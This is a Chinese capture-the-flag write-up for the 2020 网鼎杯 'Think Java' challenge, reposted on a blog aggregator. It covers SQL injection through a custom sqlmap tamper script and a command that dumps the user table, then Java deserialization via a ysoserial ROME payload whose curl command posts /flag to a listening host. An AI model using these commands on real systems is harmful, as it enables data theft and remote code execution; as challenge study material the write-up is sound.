java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp

这篇具有很好参考价值的文章主要介绍了java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

源文件代码审计

这里使用IDEA打开

Test.class

java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp
java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp
可以看到这里使用了swagger进行接口的测试,并且在/common/test/sqlDict路径下发送了POST请求,请求参数为dbName

Row和Table

都是实体类,没有什么重点

SqlDict.class

java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp
java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp
java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp
可以看到他是用于数据库连接和查询的,接受Test传来的dbName值,并且已知一个数据库myapp
此时可以对/common/test/sqlDict路径进行简单的测试:
java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp

sql注入——sqlmap的tamper编写

测试是否存在sql注入:
java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp
那么构造的payload结构是:dbName=myapp# + sql语句# 第一个#是用于在java代码中注释后面的部分使其能够正常访问到数据库
构造tamper:

#!/usr/bin/env python


from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    

    result = "myapp#"+payload


    return result

然后运行sqlmap进行SQL注入
sqlmap.py -r 1.txt -p dbName --tamper=thinkjava.py -batch -T user --dump
java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp

swagger页面接口测试

swagger是用于进行后端API接口测试的,通常需要访问/swagger-ui.html这个页面
java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp
此时我们可以通过SQL注入获得的账户去测试登录接口:
java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp
登录成功后会返回一串data,rO0AB的开头,这个就是进行base64加密的序列化内容
rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu
转为16进制:
aced000573720018636e2e6162632e636f72652e6d6f64656c2e55736572566f764643317b04f43a0200024c000269647400104c6a6176612f6c616e672f4c6f6e673b4c00046e616d657400124c6a6176612f6c616e672f537472696e673b78707372000e6a6176612e6c616e672e4c6f6e673b8be490cc8f23df0200014a000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000000000000174000561646d696e
使用SerializationDumper工具查看16进制序列化内容
https://github.com/NickstaDB/SerializationDumper

点击查看代码
STREAM_MAGIC - 0xac ed
STREAM_VERSION - 0x00 05
Contents
  TC_OBJECT - 0x73
    TC_CLASSDESC - 0x72
      className
        Length - 24 - 0x00 18
        Value - cn.abc.core.model.UserVo - 0x636e2e6162632e636f72652e6d6f64656c2e55736572566f
      serialVersionUID - 0x76 46 43 31 7b 04 f4 3a
      newHandle 0x00 7e 00 00
      classDescFlags - 0x02 - SC_SERIALIZABLE
      fieldCount - 2 - 0x00 02
      Fields
        0:
          Object - L - 0x4c
          fieldName
            Length - 2 - 0x00 02
            Value - id - 0x6964
          className1
            TC_STRING - 0x74
              newHandle 0x00 7e 00 01
              Length - 16 - 0x00 10
              Value - Ljava/lang/Long; - 0x4c6a6176612f6c616e672f4c6f6e673b
        1:
          Object - L - 0x4c
          fieldName
            Length - 4 - 0x00 04
            Value - name - 0x6e616d65
          className1
            TC_STRING - 0x74
              newHandle 0x00 7e 00 02
              Length - 18 - 0x00 12
              Value - Ljava/lang/String; - 0x4c6a6176612f6c616e672f537472696e673b
      classAnnotations
        TC_ENDBLOCKDATA - 0x78
      superClassDesc
        TC_NULL - 0x70
    newHandle 0x00 7e 00 03
    classdata
      cn.abc.core.model.UserVo
        values
          id
            (object)
              TC_OBJECT - 0x73
                TC_CLASSDESC - 0x72
                  className
                    Length - 14 - 0x00 0e
                    Value - java.lang.Long - 0x6a6176612e6c616e672e4c6f6e67
                  serialVersionUID - 0x3b 8b e4 90 cc 8f 23 df
                  newHandle 0x00 7e 00 04
                  classDescFlags - 0x02 - SC_SERIALIZABLE
                  fieldCount - 1 - 0x00 01
                  Fields
                    0:
                      Long - L - 0x4a
                      fieldName
                        Length - 5 - 0x00 05
                        Value - value - 0x76616c7565
                  classAnnotations
                    TC_ENDBLOCKDATA - 0x78
                  superClassDesc
                    TC_CLASSDESC - 0x72
                      className
                        Length - 16 - 0x00 10
                        Value - java.lang.Number - 0x6a6176612e6c616e672e4e756d626572
                      serialVersionUID - 0x86 ac 95 1d 0b 94 e0 8b
                      newHandle 0x00 7e 00 05
                      classDescFlags - 0x02 - SC_SERIALIZABLE
                      fieldCount - 0 - 0x00 00
                      classAnnotations
                        TC_ENDBLOCKDATA - 0x78
                      superClassDesc
                        TC_NULL - 0x70
                newHandle 0x00 7e 00 06
                classdata
                  java.lang.Number
                    values
                  java.lang.Long
                    values
                      value
                        (long)1 - 0x00 00 00 00 00 00 00 01
          name
            (object)
              TC_STRING - 0x74
                newHandle 0x00 7e 00 07
                Length - 5 - 0x00 05
                Value - admin - 0x61646d696e
可以猜测到这个内容是与用户信息有关的, 正好还有一个接口:`/common/user/current` 是用来获取用户信息 将data内容输入到该接口中

java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp

分析反序列化利用点

使用burp插件java Deserialization Scanner
java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp
java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp
java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp
显示可以利用ROME

ysoserial反序列化工具使用

工具地址:https://github.com/frohoff/ysoserial/releases
java -jar .\ysoserial-all.jar ROME "curl http://ip:port -d @/flag" > flag.bin
然后记得将flag.bin文件转base64编码,这里附上我的脚本,可以将base64与16进制互相转换,也可以将bin文件转为base64
-r [bin文件路径] -base64 [当前编码为base64] -hex [当前编码为16进制] -code [需要转码的内容]

点击查看代码
import base64
import sys
import os

def base64_to_hex(b64):
    b64 = b64.replace(' ', '')   # Remove spaces
    pad_len = len(b64) % 4
    if pad_len > 0:
        b64 += '='* (4-pad_len)  
        
    return base64.b64decode(b64).hex() 

def hex_to_base64(hex_str):
    byte_string = bytes.fromhex(hex_str)
    return base64.b64encode(byte_string).decode()
    
    
if __name__ == '__main__':
    encode_type = None
    code = None
    file_path = None
    
    for i in range(1, len(sys.argv)):
        if sys.argv[i] == '-code':
            code = sys.argv[i+1]
            i += 1
        elif sys.argv[i] == '-base64':
            encode_type = 'base64'
        elif sys.argv[i] == '-hex':
            encode_type = 'hex'
        elif sys.argv[i] == '-r':
            file_path = sys.argv[i+1]
            i += 1  
            
    if encode_type is None and code is None and file_path is None:
        print('Usage: python code_convert.py [-base64/-hex] [-r file_path] [-code "code_string"]')
        sys.exit(1)
    
    #直接把bin文件内容转为base64
    if file_path:
        with open(os.path.abspath(file_path), 'rb') as f:
            code = f.read()
            fbase64 = base64.b64encode(code)
            print(fbase64)
            file.close
        
    else:
            
        if code:  
            if encode_type == 'base64':
                hex_result = base64_to_hex(code)
                print(f'Base64 {code} to Hex: {hex_result}')
            elif encode_type == 'hex':
                b64_result = hex_to_base64(code)
                print(f'Hex {code} to Base64: {b64_result}')
                
        if encode_type is None or code is None:
            print('Usage: python code_convert.py [-base64/-hex] -code "code_string"')
            sys.exit(1) 
            
        if encode_type == 'base64':
            hex_result = base64_to_hex(code)
            print(f'Base64 {code} \n to Hex: {hex_result}')
        elif encode_type == 'hex':
            b64_result = hex_to_base64(code)
            print(f'Hex {code} \n to Base64: {b64_result}')

这里运行:
python3 hex-base64.py -r .\flag.bin
然后远程主机监听对应端口
nc -lvp port
再将编码好的base64编码(开头为rO0AB ,记得加上Bearer)放到 /common/user/current 接口运行
java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp文章来源地址https://www.toymoban.com/news/detail-468882.html

到了这里,关于java反序列化-[网鼎杯 2020 朱雀组]Think Java——wp的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Java序列化和反序列化

    目录 一、序列化和反序列化 二、Java序列化演示 三、反序列化漏洞 1、含义 ​序列化就是内存中的对象写入到IO流中,保存的格式可以是二进制或者文本内容。反序列化就是IO流还原成对象。 2、用途 (1)传输网络对象 (2)保存Session 1、序列化 java.io.ObjectOutputStream代表对象

    2023年04月25日
    浏览(39)
  • 【Java 基础篇】Java序列化与反序列化详解

    在Java中,序列化和反序列化是一种将对象转换为字节流和将字节流转换为对象的机制。通过序列化,可以将对象存储到文件中、传输到网络上,或者在分布式系统中进行对象的传递。本文将详细介绍Java序列化和反序列化的原理、使用方法和常见应用场景,并提供一些示例代

    2024年02月09日
    浏览(37)
  • Java安全基础之Java序列化与反序列化

    目录 ObjectInputStream 和 ObjectOutputStream java.io.Serializable 自定义序列化和反序列化 Java 的序列化(Serialization)是指将对象转换为字节序列的过程,而反序列化(Deserialization)则是将字节序列转换回对象的过程。 序列化和反序列化通常用于在网络上传输对象或者将对象持久化到文

    2024年04月22日
    浏览(39)
  • Java序列化和反序列化机制

    在阅读 ArrayList 源码的时候,注意到,其内部的成员变量动态数组 elementData 被Java中的 transient 修饰 transient 意味着Java在序列化时会跳过该字段(不序列化该字段) 而Java在默认情况下会序列化类(实现了 Java.io.Serializable 接口的类)的所有非瞬态(未被 transient 修饰

    2024年03月15日
    浏览(50)
  • [Java反序列化]—Shiro反序列化(一)

    IDEA搭建shiro550复现环境_普通网友的博客-CSDN博客 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。 那么,Payload产生的过程: 命令

    2024年02月06日
    浏览(43)
  • Java 反序列化之 XStream 反序列化

    XStream 是一个简单的基于 Java 库,Java 对象序列化到 XML,反之亦然(即:可以轻易的将 Java 对象和 XML 文档相互转换)。 下面看下如何使用 XStream 进行序列化和反序列化操作的。 先定义接口类 IPerson.java 接着定义 Person 类实现前面的接口: XStream 序列化是调用  XStream.toXML()  来实

    2024年02月10日
    浏览(58)
  • java中的序列化和反序列化

    objectOutputStream 对象的序列化,以流的形式将对象写入文件 构造方法: objectOutputStream(OutputStream out) 传入一个字节输入流创建objectOutputStream对象 成员方法: void writeObject(object obj) 将指定的对象写入objectOutputStream 使用步骤: 创建一个类,这个类实现Serializable接口,Serializable是一

    2024年02月14日
    浏览(35)
  • Java中序列化和反序列化解释

    在Java中,序列化(Serialization)是指将对象的状态转换为字节流的过程,以便将其保存到文件、在网络中传输或持久化到数据库中。而反序列化(Deserialization)则是将字节流转换回对象的过程,恢复对象的状态。 序列化和反序列化主要用于以下场景: 1. 对象持久化:通过序列

    2024年02月07日
    浏览(56)
  • Java反序列化:URLDNS的反序列化调试分析

    URLDNS链子是Java反序列化分析的第0课,网上也有很多优质的分析文章。 笔者作为Java安全初学者,也从0到1调试了一遍,现在给出调试笔记。 Java原生链序列化:利用Java.io.ObjectInputStream对象输出流的writerObject方法实现Serializable接口,将对象转化成字节序列。 Java原生链反序列化

    2024年02月15日
    浏览(37)
  • 【精选】PHP&java 序列化和反序列化漏洞

    目录 首先 其次 技巧和方法

    2024年01月23日
    浏览(52)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包